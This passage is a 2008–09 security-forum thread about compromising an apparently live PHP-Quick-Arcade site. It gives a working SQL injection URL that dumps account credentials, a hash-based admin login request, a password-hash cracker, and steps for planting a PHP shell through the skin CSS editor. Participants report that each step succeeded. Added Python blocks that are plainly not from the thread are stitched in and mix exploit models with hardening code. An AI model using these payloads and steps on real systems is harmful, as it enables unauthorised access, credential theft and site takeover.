IT Security and Insecurity Portal

SQL

Posted: Sat Nov 08, 2008 9:42 pm
slsl
Advanced user
Joined: Oct 14, 2008
Posts: 66

Alright, I guess I'm gonna come back to this MySQL error. I think I probably can't do anything with it, but waraxe said to post the error. First of all, this is PHP-Quick-Arcade 3.0 and it is open source if anyone wants to look at it.
A regular URL request looks like this:
Code: | http://***********.com/arcade/?search=content+here&by=game&searchcat=All&action=search |
and if I change the by variable to ' it gives me the following pop-up errors:
Code: | Database Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIKE '%content+here%' ORDER BY id DESC)' at line 1 |
then it says:
Code: | Query used: (SELECT gameid,game,about,Champion_name,Champion_score,times_played, FROM phpqa_games ORDER BY rand() LIMIT 1) UNION ALL (SELECT gameid,game,about,Champion_name,Champion_score,times_played, FROM phpqa_games WHERE '' LIKE '%content+here%' ORDER BY id DESC) |
I hope that's enough information for someone to tell me if I can do anything. Also, if I remember right, the user table is phpqa_users, which you could probably infer.
EDIT:
Some more information: after I do that there is an error printed on the screen
Code: | Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/*******/public_html/arcade/Arcade.php on line 2030 |
Also, if I change the by variable to random letters I get
Code: | Database error: Unknown column 'random' in 'where clause' |

Posted: Sat Nov 08, 2008 10:44 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

OK, tested this on my local server and exploiting was kinda complicated.
Still, there is a working exploit:
Code: |
http://localhost/phpqav.3.0.20/Arcade.php?search=zz&action=search&by=about>0+ORDER+BY+id+DESC)+UNION+ALL+(SELECT+1,2,CONCAT_WS(0x3a,id,name,pass,email),4,5,6+FROM+phpqa_accounts+ORDER+BY+id+ASC)--+
|
By the way, the password hashing algorithm is custom:
Code: |
$pass = md5(sha1(htmlspecialchars($_POST['postpassword'])));
|
Still, there could be a possibility to craft cookies and get in without cracking the hash. But this is just a guess; more analysis is needed.
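Added example (not code from this thread or from PHP-Quick-Arcade): a Python/sqlite3 model of the injection slsl reported in the first post and waraxe exploited above. The tables, rows and the placeholder hashes are constructed for the demo. The point that makes this bug exploitable is that the `by` parameter lands in the query as a column identifier, never inside quotes, so an escaping filter on `'` does not help; that is also why `by='` gives a syntax error while `by=random` gives "Unknown column". The real query is two parenthesised SELECTs with six columns, so waraxe's payload first closes the parenthesis with `about>0 ORDER BY id DESC)`, appends a six-column UNION ALL, and ends with `--+`, which decodes to `-- ` (MySQL needs the space after `--`). SQLite's compound SELECT does not allow an ORDER BY inside a member, so the model uses a single three-column SELECT, and because SQLite ranks TEXT above numbers (where MySQL casts a non-numeric string to 0, making `about>0` false) the always-false clause is written as `id<0`. The hardened builder whitelists the identifier and binds the search term.

```python
import sqlite3

# Constructed stand-ins for the phpqa_games / phpqa_accounts tables.
# The hashes are placeholders, not real account data.
SCHEMA = """
CREATE TABLE phpqa_games (
    id INTEGER PRIMARY KEY, gameid TEXT, game TEXT, about TEXT);
CREATE TABLE phpqa_accounts (
    id INTEGER PRIMARY KEY, name TEXT, pass TEXT, email TEXT);
INSERT INTO phpqa_games VALUES (1, 'g1', 'Tetris', 'falling blocks');
INSERT INTO phpqa_games VALUES (2, 'g2', 'Snake', 'eat and grow');
INSERT INTO phpqa_accounts VALUES (1, 'Admin', '<admin-hash>', 'admin@example.invalid');
INSERT INTO phpqa_accounts VALUES (2, 'slsl', '<slsl-hash>', 'slsl@example.invalid');
"""


def open_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_search(con, search: str, by: str):
    # Same shape as the Arcade.php search: `by` is spliced in as a column NAME.
    # Identifiers are never quoted, so an escaping filter on ' would not help.
    sql = (f"SELECT gameid, game, about FROM phpqa_games "
           f"WHERE {by} LIKE '%{search}%' ORDER BY id DESC")
    return con.execute(sql).fetchall()


# Payload in the spirit of waraxe's: finish the WHERE with a comparison on an
# existing column, append a UNION ALL with the same column count (3 here, 6 in
# the real query), and comment out the trailing LIKE / ORDER BY.
# `id<0` plays the role of `about>0` (false for every row, so only the
# account rows come back); `--` needs the trailing space, as in the `--+` URL.
PAYLOAD = ("id<0 UNION ALL SELECT id, name || ':' || pass, email "
           "FROM phpqa_accounts -- ")

# Hardened version: identifier from a fixed whitelist, search term bound as a
# parameter, so neither input can change the query's structure.
ALLOWED_BY = {"game", "about"}


def hardened_search(con, search: str, by: str):
    if by not in ALLOWED_BY:
        raise ValueError(f"search column not allowed: {by!r}")
    sql = (f"SELECT gameid, game, about FROM phpqa_games "
           f"WHERE {by} LIKE ? ORDER BY id DESC")
    return con.execute(sql, (f"%{search}%",)).fetchall()


def leaked_credentials(con) -> list:
    # What the attacker sees in the 'about' slot of the results page:
    # one "name:hash" string per account row.
    return [row[1] for row in vulnerable_search(con, "zz", PAYLOAD)]


if __name__ == "__main__":
    con = open_db()
    print(leaked_credentials(con))        # account rows, not games
    try:
        hardened_search(con, "zz", PAYLOAD)
    except ValueError as err:
        print("blocked:", err)
```

Whitelisting the identifier is the only fix that works here; `mysql_real_escape_string()` or prepared-statement placeholders cannot be applied to a column name, so the name must come from server-side constants rather than the request.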

Posted: Sat Nov 08, 2008 10:48 pm
slsl
Advanced user
Joined: Oct 14, 2008
Posts: 66

Posted: Sat Nov 08, 2008 11:16 pm
slsl
Advanced user
Joined: Oct 14, 2008
Posts: 66

Waraxe, do you know how I can make a DLL file for InsidePro to use this algorithm, or at least can you help me crack it? By the way, it is possible to forge the cookie, but I'm also looking to gain access to other parts of the site.
Code: |
411764de7c9ead24a62c08186a038d86 |
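Added example, not from the thread: a Python re-implementation of the custom hash waraxe quoted, md5(sha1(htmlspecialchars($pass))), with a small dictionary cracker, which is what a custom module for a cracker would have to reproduce. The wordlist, the rule set and the assumption of PHP 5.2-era htmlspecialchars() defaults (ENT_COMPAT: `&`, `<`, `>` and `"` encoded, `'` left alone) are the example's own. Two details matter for cracking: PHP's sha1() and md5() return lowercase hex, so the outer md5 runs over 40 hex characters rather than 20 raw digest bytes; and a password containing `&`, `<`, `>` or `"` is hashed in its entity-encoded form, so a generic md5(sha1($pass)) mode in an off-the-shelf cracker (hashcat's -m 4400, for example) only finds candidates without those characters unless the wordlist is pre-encoded.

```python
import hashlib
from typing import Iterable, Optional


def php_htmlspecialchars(s: str) -> str:
    # PHP 5.2-era defaults (ENT_COMPAT): & < > " are encoded, ' is left alone.
    # '&' is replaced first so freshly produced entities are not re-encoded.
    return (s.replace("&", "&amp;")
             .replace("<", "&lt;")
             .replace(">", "&gt;")
             .replace('"', "&quot;"))


def md5_sha1_hex(s: str) -> str:
    # md5(sha1($x)) as PHP computes it: sha1() yields 40 lowercase hex chars,
    # and md5() hashes that hex TEXT (not the 20 raw digest bytes).
    inner = hashlib.sha1(s.encode("utf-8")).hexdigest()
    return hashlib.md5(inner.encode("ascii")).hexdigest()


def phpqa_hash(password: str) -> str:
    # The full scheme quoted in the thread: md5(sha1(htmlspecialchars($pass))).
    return md5_sha1_hex(php_htmlspecialchars(password))


def candidates(word: str) -> Iterable[str]:
    # Cheap rule set: as-is, capitalised, and with one or two digits appended.
    yield word
    yield word.capitalize()
    for n in range(100):
        yield f"{word}{n}"


def crack(target_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    # Dictionary attack against one hash; returns the plaintext or None.
    target = target_hash.strip().lower()
    for word in wordlist:
        for cand in candidates(word):
            if phpqa_hash(cand) == target:
                return cand
    return None


# Constructed demo wordlist. The demo target is derived from it so the run is
# self-contained; no hash from the thread is claimed to be cracked here.
DEMO_WORDLIST = ["password", "arcade", "letmein", "admin"]

if __name__ == "__main__":
    target = phpqa_hash("arcade7")
    print(target, "->", crack(target, DEMO_WORDLIST))
```

The `md5_sha1_hex` / `phpqa_hash` split makes the encoding pitfall visible: `phpqa_hash("x&y")` equals `md5_sha1_hex("x&amp;y")`, not `md5_sha1_hex("x&y")`, so a plain md5(sha1) cracker run against these hashes must feed it entity-encoded candidates for any password containing the four special characters.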

Posted: Sat Nov 08, 2008 11:48 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

I have found an easy way to get logged in with a username and password hash. And that's without any cookie crafting. Just issue the request:
Code: |
http://localhost/phpqav.3.0.20/Arcade.php?action=login&recovery=1&userID=Admin&pword=0c7540eb7e65b553ec1ba6b20de79608
|
Let me know about the results.
P.S.
Code: |
http://localhost/phpqav.3.0.20/Arcade.php?cparea=addgames&method=upload
|
Looks like an easy way to upload a PHP shell.

Posted: Sat Nov 08, 2008 11:54 pm
slsl
Advanced user
Joined: Oct 14, 2008
Posts: 66

Thanks dude, it worked. Never mind about the password cracking, I got it and I'm gonna change it. I'll see about the upload game.

Posted: Sun Nov 09, 2008 12:17 am
slsl
Advanced user
Joined: Oct 14, 2008
Posts: 66

When I try to upload my PHP code it says that the game ID is invalid.

Posted: Sun Nov 09, 2008 12:35 am
slsl
Advanced user
Joined: Oct 14, 2008
Posts: 66

Never mind, I got it. I loaded the PHP script via the stylesheets.

Posted: Fri Jun 05, 2009 4:46 am
JasonB
Regular user
Joined: Apr 05, 2009
Posts: 23

slsl wrote: | Never mind, I got it. I loaded the PHP script via the stylesheets. |
How'd you manage that?
I'm trying and failing.
Code: |
if ($_POST['addcssfile']) {
    vsess();
    $fp = fopen("./skins/".$_POST['skincssfilename'].".css","w+");
|
Wouldn't that just make everything PHP open as text in a .css?

Posted: Sat Jun 06, 2009 11:47 pm
slsl
Advanced user
Joined: Oct 14, 2008
Posts: 66

Jason, unless it's been patched (which I doubt), what I did was this: when in the admin panel, I go to the page where you can edit the CSS, and in the URL bar I change where it shows the filename of the CSS file to a PHP file. I load that page, and in the text box you can edit the source of the PHP file you're making; when you save it, it will save to http://localhost/arcade/skins/whateverwasinurl.php and you can run it from there.
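Added example, not from the thread or from PHP-Quick-Arcade: a Python model of the file-write pattern JasonB quoted and of the CSS-editor path slsl describes, beside a hardened replacement. The `./skins/` location follows the fopen() call in JasonB's snippet; the function names and the whitelist are the example's own. The addcssfile branch forces a `.css` suffix, which is why a `.php` name does not work there, but the edit page takes the filename from the URL and writes it back unchanged, and that is the primitive that left a PHP file under skins/. The suffix-forcing branch is not safe on its own either: `../` segments still escape the directory, and on PHP before 5.3.4 a NUL byte in the name truncated the path before the appended `.css`. The hardened version accepts only a conservative character set, forces the suffix, and checks that the resolved path is still inside the skins directory.

```python
import os
import re

# Assumed on-disk location of the skins directory (the post's fopen() uses ./skins/).
SKINS_DIR = os.path.abspath("./skins")

# Conservative whitelist for a skin name: letters, digits, '_' and '-' only,
# so no '.', '/', '\\' or control bytes (including NUL) can get through.
SKIN_NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def unsafe_skin_path(user_name: str) -> str:
    # Mirrors the posted pattern: "./skins/" . $_POST['skincssfilename'] . ".css"
    # The suffix is appended, but '..' segments still escape ./skins/.
    return "./skins/" + user_name + ".css"


def unsafe_edit_path(user_name: str) -> str:
    # Model of the edit page the thread describes: the filename from the URL is
    # used as-is, so a '.php' name produces a PHP file under skins/.
    return "./skins/" + user_name


def escapes_skins_dir(path: str) -> bool:
    # True when a candidate path resolves outside SKINS_DIR.
    resolved = os.path.abspath(path)
    return os.path.commonpath([SKINS_DIR, resolved]) != SKINS_DIR


def safe_skin_path(user_name: str) -> str:
    # Hardened: whitelist the name, force the suffix server-side, then confirm
    # the resolved path is still inside SKINS_DIR (belt and braces: the regex
    # already excludes every separator and dot, but the containment check
    # survives future edits to the regex).
    if not SKIN_NAME_RE.fullmatch(user_name):
        raise ValueError(f"rejected skin name: {user_name!r}")
    path = os.path.abspath(os.path.join(SKINS_DIR, user_name + ".css"))
    if os.path.commonpath([SKINS_DIR, path]) != SKINS_DIR:
        raise ValueError("resolved path escapes the skins directory")
    return path


if __name__ == "__main__":
    for name in ["dark", "../../shell", "shell.php"]:
        where = "escapes" if escapes_skins_dir(unsafe_skin_path(name)) else "inside"
        print(f"{name!r:16} unsafe -> {unsafe_skin_path(name)} ({where})")
        try:
            print(f"{'':16} safe   -> {safe_skin_path(name)}")
        except ValueError as err:
            print(f"{'':16} safe   -> rejected: {err}")
```

Forcing the extension is necessary but not sufficient: the containment check is what stops `../` writes, and taking the filename from a server-side list rather than from the URL is what closes the editor path slsl used.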

Posted: Sun Jun 07, 2009 12:28 am
JasonB
Regular user
Joined: Apr 05, 2009
Posts: 23

Hey, that worked well, thanks.
www.waraxe.us Forum Index -> Sql injection
Powered by phpBB © 2001-2008 phpBB Group